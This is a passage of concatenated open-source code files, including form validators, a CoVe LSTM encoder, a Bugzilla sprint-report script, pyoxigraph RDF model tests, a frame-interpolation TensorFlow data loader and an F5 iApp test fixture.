fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')])
email = TextField('email', validators=[validators.Required(), validators.Email()])
birthday = DateField('birthday', validators=[ validators.Required()],format='%d/%m/%Y', description='Date format: day/month/year')
country = TextField('country', validators=[validators.Required(), validators.Length(max=50, message='Country field must be 50 characters long.')])
state_province_region = TextField('state_province_region', validators=[validators.Required(), validators.Length( max=50, message='Format error.')])
city = TextField('city', validators=[validators.Required(), validators.Length(max=50, message='City field must be 50 characters long.')])
profile = SelectField('gender', choices=[('development_agents', 'Development Agents'),('entrepreneurs', 'Entrepreneurs'), ('students', 'Students and Professionals')])
occupation = TextField('occupation', validators=[validators.Required(), validators.Length(max=50, message='Occupation field must be 50 characters long.')])
institution = TextField('institution', validators=[validators.Optional(), validators.Length(max=50, message='Institution field must be 50 characters long.')])
agree_mailer = BooleanField('agree_mailer')
|
osp/institutions/utils.py | davidmcclure/open-syllabus-project | 220 | 12796785 | <reponame>davidmcclure/open-syllabus-project
import tldextract
import re
from urllib.parse import urlparse
def seed_to_regex(seed):
"""
Given a URL, make a regex that matches child URLs.
Args:
seed (str)
Returns: regex
"""
parsed = urlparse(seed)
# 1 -- If the seed has a non-www subdomain, require a matching subdomain.
subdomain = ''
tld = tldextract.extract(seed)
if tld.subdomain and tld.subdomain != 'www':
subdomain = '[./]'+tld.subdomain
    # 2 -- Require the registered domain and suffix, e.g. yale.edu.
netloc = '[./]{0}.{1}'.format(tld.domain, tld.suffix)
# 3 -- If a path is present, require a sub-path.
path = ''
clean_path = parsed.path.rstrip('/')
if clean_path:
path = re.escape(clean_path+'/')
# Join the parts.
pattern = ''.join([subdomain, netloc, path])
return re.compile(pattern, re.I)
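# Illustrative behaviour (assumed example, not from the original tests):
#   seed_to_regex('http://history.yale.edu/courses') yields a pattern that
#   matches 'http://history.yale.edu/courses/hist-101' but not
#   'http://www.yale.edu/'.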
def strip_csv_row(row):
"""
    Strip values in a CSV row, casting '' -> None.
"""
return {
key: val.strip() or None
for key, val in row.items()
}
|
jiant/jiant/modules/cove/cove/encoder.py | amirziai/cs229-project | 500 | 12796787 | <gh_stars>100-1000
import os
import torch
from torch import nn
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
import torch.utils.model_zoo as model_zoo
model_urls = {
'wmt-lstm' : 'https://s3.amazonaws.com/research.metamind.io/cove/wmtlstm-8f474287.pth'
}
MODEL_CACHE = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.torch')
class MTLSTM(nn.Module):
def __init__(self, n_vocab=None, vectors=None, residual_embeddings=False, layer0=False, layer1=True, trainable=False, model_cache=MODEL_CACHE):
"""Initialize an MTLSTM. If layer0 and layer1 are True, they are concatenated along the last dimension so that layer0 outputs
contribute the first 600 entries and layer1 contributes the second 600 entries. If residual embeddings is also true, inputs
are also concatenated along the last dimension with any outputs such that they form the first 300 entries.
Arguments:
n_vocab (int): If not None, initialize MTLSTM with an embedding matrix with n_vocab vectors
vectors (Float Tensor): If not None, initialize embedding matrix with specified vectors (These should be 300d CommonCrawl GloVe vectors)
            residual_embeddings (bool): If True, concatenate the input GloVe embeddings with contextualized word vectors as final output
layer0 (bool): If True, return the outputs of the first layer of the MTLSTM
layer1 (bool): If True, return the outputs of the second layer of the MTLSTM
trainable (bool): If True, do not detach outputs; i.e. train the MTLSTM (recommended to leave False)
model_cache (str): path to the model file for the MTLSTM to load pretrained weights (defaults to the best MTLSTM from (McCann et al. 2017) --
that MTLSTM was trained with 300d 840B GloVe on the WMT 2017 machine translation dataset.
"""
super(MTLSTM, self).__init__()
self.layer0 = layer0
self.layer1 = layer1
self.residual_embeddings = residual_embeddings
self.trainable = trainable
self.embed = False
if n_vocab is not None:
self.embed = True
self.vectors = nn.Embedding(n_vocab, 300)
if vectors is not None:
self.vectors.weight.data = vectors
state_dict = model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache)
if layer0:
layer0_dict = {k: v for k, v in state_dict.items() if 'l0' in k}
self.rnn0 = nn.LSTM(300, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn0.load_state_dict(layer0_dict)
if layer1:
layer1_dict = {k.replace('l1', 'l0'): v for k, v in state_dict.items() if 'l1' in k}
self.rnn1 = nn.LSTM(600, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(layer1_dict)
elif layer1:
self.rnn1 = nn.LSTM(300, 300, num_layers=2, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache))
else:
raise ValueError('At least one of layer0 and layer1 must be True.')
def forward(self, inputs, lengths, hidden=None):
"""
Arguments:
inputs (Tensor): If MTLSTM handles embedding, a Long Tensor of size (batch_size, timesteps).
Otherwise, a Float Tensor of size (batch_size, timesteps, features).
            lengths (Long Tensor): lengths of each sequence for handling padding
hidden (Float Tensor): initial hidden state of the LSTM
"""
if self.embed:
inputs = self.vectors(inputs)
if not isinstance(lengths, torch.Tensor):
lengths = torch.Tensor(lengths).long()
if inputs.is_cuda:
with torch.cuda.device_of(inputs):
lengths = lengths.cuda(torch.cuda.current_device())
lens, indices = torch.sort(lengths, 0, True)
outputs = [inputs] if self.residual_embeddings else []
len_list = lens.tolist()
packed_inputs = pack(inputs[indices], len_list, batch_first=True)
if self.layer0:
outputs0, hidden_t0 = self.rnn0(packed_inputs, hidden)
unpacked_outputs0 = unpack(outputs0, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs0 = unpacked_outputs0[_indices]
outputs.append(unpacked_outputs0)
packed_inputs = outputs0
if self.layer1:
outputs1, hidden_t1 = self.rnn1(packed_inputs, hidden)
unpacked_outputs1 = unpack(outputs1, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs1 = unpacked_outputs1[_indices]
outputs.append(unpacked_outputs1)
outputs = torch.cat(outputs, 2)
return outputs if self.trainable else outputs.detach()
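# Minimal usage sketch (illustrative, not part of the original repo):
#
#   cove = MTLSTM(n_vocab=vocab_size, vectors=glove_vectors)  # 300d GloVe
#   outputs = cove(word_ids, lengths)  # (batch, time, 600) with the defaults
#
# With the default flags (layer1 only, no residual embeddings) the output is
# the 600-d bidirectional state of the second LSTM layer.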
|
scripts/sprint_report.py | AndrewDVXI/kitsune | 929 | 12796792 | <gh_stars>100-1000
#!/usr/bin/env python
import logging
import sys
import textwrap
import xmlrpc.client
USAGE = 'Usage: sprint_report.py <SPRINT>'
HEADER = 'sprint_report.py: your friendly report view of the sprint!'
# Note: Most of the bugzila api code comes from Scrumbugz.
cache = {}
log = logging.getLogger(__name__)
BZ_URL = 'http://bugzilla.mozilla.org/xmlrpc.cgi'
SESSION_COOKIES_CACHE_KEY = 'bugzilla-session-cookies'
BZ_RESOLUTIONS = ['', 'FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE',
'WORKSFORME', 'DUPLICATE']
BZ_FIELDS = [
'id',
'status',
'resolution',
'summary',
'whiteboard',
'assigned_to',
'priority',
'severity',
'product',
'component',
'blocks',
'depends_on',
'creation_time',
'last_change_time',
'target_milestone',
]
UNWANTED_COMPONENT_FIELDS = [
'sort_key',
'is_active',
'default_qa_contact',
'default_assigned_to',
'description'
]
class SessionTransport(xmlrpc.client.SafeTransport):
"""
XML-RPC HTTPS transport that stores auth cookies in the cache.
"""
_session_cookies = None
@property
def session_cookies(self):
if self._session_cookies is None:
cookie = cache.get(SESSION_COOKIES_CACHE_KEY)
if cookie:
self._session_cookies = cookie
return self._session_cookies
def parse_response(self, response):
cookies = self.get_cookies(response)
if cookies:
self._session_cookies = cookies
            cache[SESSION_COOKIES_CACHE_KEY] = self._session_cookies
log.debug('Got cookie: %s', self._session_cookies)
return xmlrpc.client.Transport.parse_response(self, response)
def send_host(self, connection, host):
cookies = self.session_cookies
if cookies:
for cookie in cookies:
connection.putheader('Cookie', cookie)
log.debug('Sent cookie: %s', cookie)
return xmlrpc.client.Transport.send_host(self, connection, host)
def get_cookies(self, response):
cookie_headers = None
if hasattr(response, 'msg'):
            cookies = response.msg.get_all('set-cookie')
if cookies:
log.debug('Full cookies: %s', cookies)
cookie_headers = [c.split(';', 1)[0] for c in cookies]
return cookie_headers
class BugzillaAPI(xmlrpc.client.ServerProxy):
def get_bug_ids(self, **kwargs):
"""Return list of ids of bugs from a search."""
kwargs.update({
'include_fields': ['id'],
})
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
return [bug['id'] for bug in bugs.get('bugs', [])]
def get_bugs(self, **kwargs):
get_history = kwargs.pop('history', True)
get_comments = kwargs.pop('comments', True)
kwargs.update({
'include_fields': BZ_FIELDS,
})
if 'ids' in kwargs:
kwargs['permissive'] = True
log.debug('Getting bugs with kwargs: %s', kwargs)
bugs = self.Bug.get(kwargs)
else:
if 'whiteboard' not in kwargs:
kwargs['whiteboard'] = ['u=', 'c=', 'p=']
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
bug_ids = [bug['id'] for bug in bugs.get('bugs', [])]
if not bug_ids:
return bugs
# mix in history and comments
history = comments = {}
if get_history:
history = self.get_history(bug_ids)
if get_comments:
comments = self.get_comments(bug_ids)
for bug in bugs['bugs']:
bug['history'] = history.get(bug['id'], [])
bug['comments'] = comments.get(bug['id'], {}).get('comments', [])
bug['comments_count'] = len(comments.get(bug['id'], {})
.get('comments', []))
return bugs
def get_history(self, bug_ids):
log.debug('Getting history for bugs: %s', bug_ids)
try:
history = self.Bug.history({'ids': bug_ids}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting history for bug ids: %s', bug_ids)
return {}
return dict((h['id'], h['history']) for h in history)
def get_comments(self, bug_ids):
log.debug('Getting comments for bugs: %s', bug_ids)
try:
comments = self.Bug.comments({
'ids': bug_ids,
'include_fields': ['id', 'creator', 'time', 'text'],
}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting comments for bug ids: %s', bug_ids)
return {}
return dict((int(bid), cids) for bid, cids in comments.items())
def wrap(text, indent=' '):
text = text.split('\n\n')
text = [textwrap.fill(part, expand_tabs=True, initial_indent=indent,
subsequent_indent=indent)
for part in text]
return '\n\n'.join(text)
def sprint_stats(bugs):
"""Print bugs stats block."""
# Return dict of bugs stats
#
# * total points
# * breakdown of points by component
# * breakdown of points by focus
# * breakdown of points by priority
# * other things?
def parse_whiteboard(whiteboard):
bits = {
'u': '',
'c': '',
'p': '',
's': ''
}
for part in whiteboard.split(' '):
part = part.split('=')
if len(part) != 2:
continue
if part[0] in bits:
bits[part[0]] = part[1]
return bits
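# Whiteboard convention parsed above (illustrative values):
#   "u=dev c=support p=2 s=2012.19"
#   -> {'u': 'dev', 'c': 'support', 'p': '2', 's': '2012.19'}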
def get_history(bugs, sprint):
history = []
for bug in bugs:
for item in bug.get('history', []):
for change in item.get('changes', []):
added = parse_whiteboard(change['added'])
removed = parse_whiteboard(change['removed'])
if ((change['field_name'] == 'status_whiteboard'
and removed['s'] != sprint
and added['s'] == sprint)):
history.append((
item['when'],
bug,
item['who'],
removed['s'],
added['s']
))
return history
def sprint_timeline(bugs, sprint):
"""Print timeline block."""
timeline = []
history = get_history(bugs, sprint)
# Try to associate the change that added the sprint to the
# whiteboard with a comment.
for when, bug, who, removed, added in history:
reason = 'NO COMMENT'
for comment in bug.get('comments', []):
if comment['time'] == when and comment['creator'] == who:
reason = comment['text']
break
timeline.append((
when,
bug['id'],
who,
removed,
added,
reason
))
timeline.sort(key=lambda item: item[0])
for mem in timeline:
print('%s: %s: %s' % (mem[0], mem[1], mem[2]))
print(' %s -> %s' % (mem[3] if mem[3] else 'unassigned', mem[4]))
print(wrap(mem[5]))
print('')
def print_header(text):
print(text)
print('=' * len(text))
print('')
def main(argv):
# logging.basicConfig(level=logging.DEBUG)
if not argv:
print(USAGE)
print('Error: Must specify the sprint to report on. e.g. 2012.19')
return 1
sprint = argv[0]
print(HEADER)
print('')
print('Working on %s' % sprint)
print('')
bugzilla = BugzillaAPI(
BZ_URL,
transport=SessionTransport(use_datetime=True),
allow_none=True)
bugs = bugzilla.get_bugs(
product=['support.mozilla.org'],
whiteboard=['s=' + sprint],
resolution=BZ_RESOLUTIONS,
history=True,
comments=True)
bugs = bugs['bugs']
print_header('Timeline')
sprint_timeline(bugs, sprint)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
plugins/tasks_plugin/__init__.py | shivammmmm/querybook | 1,144 | 12796803 | # from tasks.delete_mysql_cache import delete_mysql_cache
# delete_mysql_cache
|
python/tests/test_model.py | alexkreidler/oxigraph | 403 | 12796841 | import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
|
questions/permutations/Solution.py | marcus-aurelianus/leetcode-solutions | 141 | 12796869 | '''
Given a collection of distinct integers, return all possible permutations.
Example:
Input: [1,2,3]
Output:
[
[1,2,3],
[1,3,2],
[2,1,3],
[2,3,1],
[3,1,2],
[3,2,1]
]
'''
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
def generate_permutation(nums, ret, curr, visited):
if len(curr) == len(nums):
ret.append(list(curr))
return
for num in nums:
if num in visited:
continue
visited.add(num)
curr.append(num)
generate_permutation(nums, ret, curr, visited)
curr.pop()
visited.remove(num)
ret = []
curr = []
visited = set()
generate_permutation(nums, ret, curr, visited)
return ret
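# Example (illustrative): Solution().permute([1, 2, 3]) yields the six
# orderings listed in the docstring, starting with [1, 2, 3], because the
# backtracking tries candidates in their original order.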
|
training/data_lib.py | vsewall/frame-interpolation | 521 | 12796891 | # Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataset creation for frame interpolation."""
from typing import Callable, Dict, List, Optional
from absl import logging
import gin.tf
import tensorflow as tf
def _create_feature_map() -> Dict[str, tf.io.FixedLenFeature]:
"""Creates the feature map for extracting the frame triplet."""
feature_map = {
'frame_0/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_0/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_0/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_0/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_1/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_1/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_2/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_2/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'path':
tf.io.FixedLenFeature((), tf.string, default_value=''),
}
return feature_map
def _parse_example(sample):
"""Parses a serialized sample.
Args:
sample: A serialized tf.Example to be parsed.
Returns:
    dictionary containing the following:
      'x0', 'x1': the decoded first and last input frames
      'y': the decoded middle (ground-truth) frame
      'time': the fractional time of 'y', fixed at 0.5
      'path': the original mid-frame filepath
"""
feature_map = _create_feature_map()
features = tf.io.parse_single_example(sample, feature_map)
output_dict = {
'x0': tf.io.decode_image(features['frame_0/encoded'], dtype=tf.float32),
'x1': tf.io.decode_image(features['frame_2/encoded'], dtype=tf.float32),
'y': tf.io.decode_image(features['frame_1/encoded'], dtype=tf.float32),
# The fractional time value of frame_1 is not included in our tfrecords,
# but is always at 0.5. The model will expect this to be specificed, so
# we insert it here.
'time': 0.5,
# Store the original mid frame filepath for identifying examples.
'path': features['path'],
}
return output_dict
def _random_crop_images(crop_size: int, images: tf.Tensor,
total_channel_size: int) -> tf.Tensor:
"""Crops the tensor with random offset to the given size."""
if crop_size > 0:
crop_shape = tf.constant([crop_size, crop_size, total_channel_size])
images = tf.image.random_crop(images, crop_shape)
return images
def crop_example(example: tf.Tensor, crop_size: int,
crop_keys: Optional[List[str]] = None):
"""Random crops selected images in the example to given size and keys.
Args:
example: Input tensor representing images to be cropped.
crop_size: The size to crop images to. This value is used for both
height and width.
crop_keys: The images in the input example to crop.
Returns:
Example with cropping applied to selected images.
"""
if crop_keys is None:
crop_keys = ['x0', 'x1', 'y']
channels = [3, 3, 3]
# Stack images along channel axis, and perform a random crop once.
image_to_crop = [example[key] for key in crop_keys]
stacked_images = tf.concat(image_to_crop, axis=-1)
cropped_images = _random_crop_images(crop_size, stacked_images, sum(channels))
cropped_images = tf.split(
cropped_images, num_or_size_splits=channels, axis=-1)
for key, cropped_image in zip(crop_keys, cropped_images):
example[key] = cropped_image
return example
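# Stacking x0, x1 and y along the channel axis before a single random crop
# guarantees that all three frames receive exactly the same spatial window.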
def apply_data_augmentation(
augmentation_fns: Dict[str, Callable[..., tf.Tensor]],
example: tf.Tensor,
augmentation_keys: Optional[List[str]] = None) -> tf.Tensor:
"""Applies random augmentation in succession to selected image keys.
Args:
augmentation_fns: A Dict of Callables to data augmentation functions.
example: Input tensor representing images to be augmented.
augmentation_keys: The images in the input example to augment.
Returns:
Example with augmentation applied to selected images.
"""
if augmentation_keys is None:
augmentation_keys = ['<KEY>']
# Apply each augmentation in sequence
augmented_images = {key: example[key] for key in augmentation_keys}
for augmentation_function in augmentation_fns.values():
augmented_images = augmentation_function(augmented_images)
for key in augmentation_keys:
example[key] = augmented_images[key]
return example
def _create_from_tfrecord(batch_size, file, augmentation_fns,
crop_size) -> tf.data.Dataset:
"""Creates a dataset from TFRecord."""
dataset = tf.data.TFRecordDataset(file)
dataset = dataset.map(
_parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Perform data_augmentation before cropping and batching
if augmentation_fns is not None:
dataset = dataset.map(
lambda x: apply_data_augmentation(augmentation_fns, x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
if crop_size > 0:
dataset = dataset.map(
lambda x: crop_example(x, crop_size=crop_size),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
dataset = dataset.batch(batch_size, drop_remainder=True)
return dataset
def _generate_sharded_filenames(filename: str) -> List[str]:
"""Generates filenames of the each file in the sharded filepath.
Based on github.com/google/revisiting-self-supervised/blob/master/datasets.py.
Args:
filename: The sharded filepath.
Returns:
A list of filepaths for each file in the shard.
"""
base, count = filename.split('@')
count = int(count)
return ['{}-{:05d}-of-{:05d}'.format(base, i, count) for i in range(count)]
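# For example, a sharded spec such as 'train@3' expands to
#   ['train-00000-of-00003', 'train-00001-of-00003', 'train-00002-of-00003'].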
def _create_from_sharded_tfrecord(batch_size,
train_mode,
file,
augmentation_fns,
crop_size,
max_examples=-1) -> tf.data.Dataset:
"""Creates a dataset from a sharded tfrecord."""
dataset = tf.data.Dataset.from_tensor_slices(
_generate_sharded_filenames(file))
# pylint: disable=g-long-lambda
dataset = dataset.interleave(
lambda x: _create_from_tfrecord(
batch_size,
file=x,
augmentation_fns=augmentation_fns,
crop_size=crop_size),
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=not train_mode)
# pylint: enable=g-long-lambda
dataset = dataset.prefetch(buffer_size=2)
if max_examples > 0:
return dataset.take(max_examples)
return dataset
@gin.configurable('training_dataset')
def create_training_dataset(
batch_size: int,
file: Optional[str] = None,
files: Optional[List[str]] = None,
crop_size: int = -1,
crop_sizes: Optional[List[int]] = None,
augmentation_fns: Optional[Dict[str, Callable[..., tf.Tensor]]] = None
) -> tf.data.Dataset:
"""Creates the training dataset.
The given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
Args:
batch_size: The number of images to batch per example.
file: (deprecated) A path to a sharded tfrecord in <tfrecord>@N format.
Deprecated. Use 'files' instead.
files: A list of paths to sharded tfrecords in <tfrecord>@N format.
crop_size: (deprecated) If > 0, images are cropped to crop_size x crop_size
using tensorflow's random cropping. Deprecated: use 'files' and
'crop_sizes' instead.
crop_sizes: List of crop sizes. If > 0, images are cropped to
crop_size x crop_size using tensorflow's random cropping.
augmentation_fns: A Dict of Callables to data augmentation functions.
Returns:
A tensorflow dataset for accessing examples that contain the input images
'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a
dictionary of tensors.
"""
if file:
logging.warning('gin-configurable training_dataset.file is deprecated. '
'Use training_dataset.files instead.')
return _create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size)
else:
if not crop_sizes or len(crop_sizes) != len(files):
raise ValueError('Please pass crop_sizes[] with training_dataset.files.')
if crop_size > 0:
raise ValueError(
'crop_size should not be used with files[], use crop_sizes[] instead.'
)
tables = []
for file, crop_size in zip(files, crop_sizes):
tables.append(
_create_from_sharded_tfrecord(batch_size, True, file,
augmentation_fns, crop_size))
return tf.data.experimental.sample_from_datasets(tables)
@gin.configurable('eval_datasets')
def create_eval_datasets(batch_size: int,
files: List[str],
names: List[str],
crop_size: int = -1,
max_examples: int = -1) -> Dict[str, tf.data.Dataset]:
"""Creates the evaluation datasets.
As opposed to create_training_dataset this function makes sure that the
examples for each dataset are always read in a deterministic (same) order.
Each given tfrecord should contain data in a format produced by
frame_interpolation/datasets/create_*_tfrecord.py
The (batch_size, crop_size, max_examples) are specified for all eval datasets.
Args:
batch_size: The number of images to batch per example.
files: List of paths to a sharded tfrecord in <tfrecord>@N format.
names: List of names of eval datasets.
crop_size: If > 0, images are cropped to crop_size x crop_size using
tensorflow's random cropping.
max_examples: If > 0, truncate the dataset to 'max_examples' in length. This
can be useful for speeding up evaluation loop in case the tfrecord for the
evaluation set is very large.
Returns:
A dict of name to tensorflow dataset for accessing examples that contain the
input images 'x0', 'x1', ground truth 'y' and time of the ground truth
'time'=[0,1] in a dictionary of tensors.
"""
return {
name: _create_from_sharded_tfrecord(batch_size, False, file, None,
crop_size, max_examples)
for name, file in zip(names, files)
}
|
ch09/complexity.py | ricjuanflores/practice-of-the-python | 319 | 12796943 | def has_long_words(sentence):
if isinstance(sentence, str): # <1>
sentence = sentence.split(' ')
for word in sentence: # <2>
if len(word) > 10: # <3>
return True
return False # <4>
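# Illustrative calls (not part of the book listing):
#   has_long_words("just a few short words")           -> False
#   has_long_words(["supercalifragilistic", "word"])   -> True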
|
recipes/Python/286229_Remove_control_character_M_opened_html/recipe-286229.py | tdiprima/code | 2,023 | 12797009 | <reponame>tdiprima/code
import string
# The Stripper class below subclasses SGMLParser; under Python 2 that class
# lives in the standard-library module imported here (assumed import, not
# shown in the original recipe snippet).
from sgmllib import SGMLParser
class Stripper( SGMLParser ) :
...
def handle_data( self, data ) :
data = string.replace( data, '\r', '' )
...
|
f5/bigip/shared/test/functional/test_iapp.py | nghia-tran/f5-common-python | 272 | 12797027 | # Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from distutils.version import LooseVersion
from requests.exceptions import HTTPError
pytestmark = pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release'))
< LooseVersion('12.0.0'),
reason='Needs v12 TMOS or greater to pass.'
)
@pytest.fixture(scope='function')
def iapp_lx(mgmt_root):
fake_iapp_name = 'foo-iapp.rpm'
sio = StringIO(80*'a')
ftu = mgmt_root.shared.file_transfer.uploads
ftu.upload_stringio(sio, fake_iapp_name, chunk_size=20)
yield fake_iapp_name
tpath_name = '/var/config/rest/downloads/{0}'.format(fake_iapp_name)
mgmt_root.tm.util.unix_rm.exec_cmd('run', utilCmdArgs=tpath_name)
@pytest.fixture(scope='function')
